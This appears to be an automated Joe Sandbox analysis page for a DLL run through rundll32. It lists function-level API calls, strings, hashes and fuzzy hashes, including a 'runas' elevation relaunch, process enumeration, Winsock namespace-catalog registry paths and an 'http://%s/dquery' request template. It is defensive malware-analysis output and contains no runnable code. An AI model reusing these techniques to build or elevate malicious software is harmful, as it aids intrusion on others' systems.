LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
String ID:
API String ID: 3317409091-0
Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066A90
GetModuleFileNameW.KERNEL32 ref: 0000000180066AA1
GetCommandLineW.KERNEL32 ref: 0000000180066B41
memset.MSVCRT ref: 0000000180066B85
ShellExecuteExW.SHELL32 ref: 0000000180066BCC
CloseHandle.KERNEL32 ref: 0000000180066BE1

Strings

/elevated, xrefs: 0000000180066B55
runas, xrefs: 0000000180066B9B
MPR.dll, xrefs: 0000000180066AC1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
String ID: /elevated$MPR.dll$runas
API String ID: 3400839104-479190379
Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C8C Relevance: 15.2, APIs: 10, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 0000000180028D17
_wcsupr.MSVCRT ref: 0000000180028D26
StringFromGUID2.OLE32 ref: 0000000180028DCA
_wcsupr.MSVCRT ref: 0000000180028DD8
StringFromGUID2.OLE32 ref: 0000000180028E38
_wcsupr.MSVCRT ref: 0000000180028E4A
StringFromGUID2.OLE32 ref: 0000000180028E84
_wcsupr.MSVCRT ref: 0000000180028E92
StringFromGUID2.OLE32 ref: 0000000180028EC4
_wcsupr.MSVCRT ref: 0000000180028ED5

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FromString_wcsupr$HeapProcess
String ID:
API String ID: 2249050647-0
Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC851C38 Relevance: 15.2, APIs: 10, Instructions: 234processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000187EC851C72

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

Process32First.KERNEL32 ref: 00000187EC851CFC
Process32Next.KERNEL32 ref: 00000187EC851D1D
Process32First.KERNEL32 ref: 00000187EC851D49
Process32Next.KERNEL32 ref: 00000187EC851D96
Process32First.KERNEL32 ref: 00000187EC851DAD
wsprintfA.USER32 ref: 00000187EC851EF0
wsprintfA.USER32 ref: 00000187EC851F96
Process32Next.KERNEL32 ref: 00000187EC8520D3
CloseHandle.KERNEL32 ref: 00000187EC8520F0

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
String ID:
API String ID: 3605396869-0
Opcode ID: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
Instruction ID: 9f23332d66a687fe7decd5078518536a6cbc24b6cf70086220ccac89601ddab6
Opcode Fuzzy Hash: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
Instruction Fuzzy Hash: F0D11C7A22DA8495EA70DB14E5D03DAB7A1F7C4384FA08155E78D43AE9EF7CC649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800421D4 Relevance: 15.2, APIs: 10, Instructions: 163networkCOMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423F9

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 000000018004228E
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800422DA
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042302
htons.WS2_32 ref: 000000018004234A
htonl.WS2_32 ref: 0000000180042358
htons.WS2_32 ref: 0000000180042366
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0000000180042385
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423AB
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423D3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
String ID:
API String ID: 505489203-0
Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052280 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 220COMMON

Download Yara Rule

Strings

SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF
Num_Catalog_Entries, xrefs: 0000000180052346
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
Num_Catalog_Entries64, xrefs: 000000018005233F
%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 0-1196714001
Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 000000018002C7A1
_wcsupr.MSVCRT ref: 000000018002C7AF
SysFreeString.OLEAUT32 ref: 000000018002C8DA
??_V@YAXPEAX@Z.MSVCRT ref: 000000018002C8EC
??3@YAXPEAX@Z.MSVCRT ref: 000000018002C8FE
_wtoi.MSVCRT ref: 000000018002C9F2

Strings

hotkey, xrefs: 000000018002C95A
internetshortcut, xrefs: 000000018002C96B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
String ID: hotkey$internetshortcut
API String ID: 2885337837-1159320594
Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AA00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000000018003AA41
Sleep.KERNEL32(?,?,?,?,00000000), ref: 000000018003AA64

Strings

JudgeVersion, xrefs: 000000018003AB6A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: JudgeVersion
API String ID: 1164918020-3141317846
Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005E750 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152filesynchronizationCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 000000018005E831
GetFileAttributesW.KERNEL32 ref: 000000018005E898
SetFileAttributesW.KERNEL32 ref: 000000018005E8B3
DeleteFileW.KERNEL32 ref: 000000018005E909
GetLastError.KERNEL32 ref: 000000018005E919
GetLastError.KERNEL32 ref: 000000018005E921
ReleaseMutex.KERNEL32 ref: 000000018005E936

Strings

PRAGMA synchronous = OFF;, xrefs: 000000018005E7E9, 000000018005E87B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File$AttributesDeleteErrorLast$MutexRelease
String ID: PRAGMA synchronous = OFF;
API String ID: 874664252-1854902270
Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044568 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800445B0

Part of subcall function 00000001800463BC: ??2@YAPEAX_K@Z.MSVCRT ref: 00000001800463D3

GetTickCount.KERNEL32 ref: 000000018004461F
srand.MSVCRT ref: 0000000180044627
rand.MSVCRT ref: 000000018004462D
rand.MSVCRT ref: 0000000180044651
InitializeCriticalSection.KERNEL32 ref: 0000000180044763

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 000000018004483D
Part of subcall function 0000000180044810: ??3@YAXPEAX@Z.MSVCRT ref: 000000018004488A
Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 00000001800448AA

??3@YAXPEAX@Z.MSVCRT ref: 00000001800447A5

Strings

http://%s/dquery, xrefs: 00000001800446A3, 00000001800446F3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
String ID: http://%s/dquery
API String ID: 3689213441-2489601265
Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005ECC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180018E8C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
Part of subcall function 0000000180018E8C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
Part of subcall function 0000000180018E8C: DeviceIoControl.KERNEL32 ref: 0000000180018F04
Part of subcall function 0000000180018E8C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

memset.MSVCRT ref: 000000018005ED13
GetModuleFileNameW.KERNEL32 ref: 000000018005ED24

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

GetModuleFileNameW.KERNEL32 ref: 000000018005ED55
PathAppendW.SHLWAPI ref: 000000018005ED69
PathFileExistsW.SHLWAPI ref: 000000018005EDD0

Strings

\deepscan\heavygate64.dll, xrefs: 000000018005EDBA
\heavygate64.dll, xrefs: 000000018005EDEE
\Config\MessageCenter.db, xrefs: 000000018005ED93

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
API String ID: 830827343-1853890022
Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800042C6

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetFileAttributesW.KERNEL32 ref: 00000001800042FA
memset.MSVCRT ref: 0000000180004316
ILCreateFromPath.SHELL32 ref: 0000000180004330
ILCombine.SHELL32 ref: 000000018000437A
CoTaskMemFree.OLE32 ref: 0000000180004387
CoTaskMemFree.OLE32 ref: 0000000180004394

Strings

:, xrefs: 00000001800042E7

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
String ID: :
API String ID: 2941325240-336475711
Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060A0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180060A59
GetClassNameW.USER32 ref: 0000000180060A6C
StrCmpIW.SHLWAPI ref: 0000000180060A8C
StrCmpIW.SHLWAPI ref: 0000000180060AAD
GetWindowTextW.USER32 ref: 0000000180060AC5
StrStrIW.SHLWAPI ref: 0000000180060AE0

Strings

Microsoft Edge, xrefs: 0000000180060AD4
ApplicationFrameWindow, xrefs: 0000000180060AA6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ClassNameTextWindowmemset
String ID: ApplicationFrameWindow$Microsoft Edge
API String ID: 1817102812-2764675319
Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008B5C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008B8A
GetProcAddress.KERNEL32 ref: 0000000180008B9F
RegDeleteKeyW.ADVAPI32 ref: 0000000180008BD1
GetModuleHandleW.KERNEL32 ref: 0000000180008BFE
GetProcAddress.KERNEL32 ref: 0000000180008C13

Strings

Advapi32.dll, xrefs: 0000000180008B83, 0000000180008BF7
RegDeleteKeyTransactedW, xrefs: 0000000180008B95
RegDeleteKeyExW, xrefs: 0000000180008C09

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064DE4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064E2F
GetModuleFileNameW.KERNEL32 ref: 0000000180064E51
PathAppendW.SHLWAPI ref: 0000000180064E63
PathAppendW.SHLWAPI ref: 0000000180064E75
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180064E7E

